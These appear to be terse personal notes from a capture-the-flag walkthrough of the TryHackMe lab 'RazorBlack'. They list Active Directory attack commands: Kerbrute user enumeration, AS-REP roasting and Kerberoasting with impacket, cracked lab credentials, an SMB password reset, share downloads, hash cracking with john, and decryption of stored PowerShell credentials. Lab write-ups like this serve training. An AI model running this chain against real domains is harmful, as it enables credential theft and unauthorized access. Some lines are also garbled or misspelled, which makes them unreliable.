RazorBlack
./kerbrute_linux_386 userenum -d raz0rblack.thm --dc 10.10.241.105 users.txt 
showmount -e 10.10.241.105
i open exel file i found users
REP-REPOSTING
impacket-GetNPUsers raz0rblack.thm/ -dc-ip 10.10.194.110 -usersfile users.txt -format john -outputfile crackme.txt -no-pass -request
user cracked
twilliams:roastpotatoes
Targeted Kerberoast
impacket-GetUserSPNs raz0rblack.thm/twilliams:roastpotatoes -dc-ip 10.10.35.193 -request
xyan1d3:cyanide9amine5628
i found a local domain user made secretsdump
xyan1d3.xml
01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e14ed790000000002000000000003660000c000000010000000f098beb903e1a489eed98b779f3c70b80000000004800000a000000010000000e59705c44a560ce4c53e837d111bb39970000000feda9c94c6cd1687ffded5f438c59b080362e7e2fe0d9be8d2ab96ec7895303d167d5b38ce255ac6c01d7ac510ef662e48c53d3c89645053599c00d9e8a15598e8109d23a91a8663f886de1ba405806944f3f7e7df84091af0c73a4effac97ad05a3d6822cdeb06d4f415ba19587574f1400000051021e80fd5264d9730df52d2567cd7285726da2
impacket-smbpasswd sbradley@10.10.108.185
Smbmap to show sharing file
smbmap -H 10.10.108.185 -u 'sbradley' -p '1234@Asd' -r trash --download trash/experiment_gone_wrong.zip
zip2jon file.zip > ziphash
john ziphash --wordlist=/usr/share/wordlists/rockyou.txt 
$Credential = Import-Clixml -Path "root.xml"
$Credential.GetNetworkCredential().passwordImport-Clixml -Path "xyan1d3.xml": This command imports data from an XML file named "xyan1d3.xml". The XML file should contain a serialized PSCredential object. This method is commonly used for securely storing and retrieving credentials.
Convert SecureString to Plain Text (if absolutely necessary, but not recommended due to security concerns):
Last updated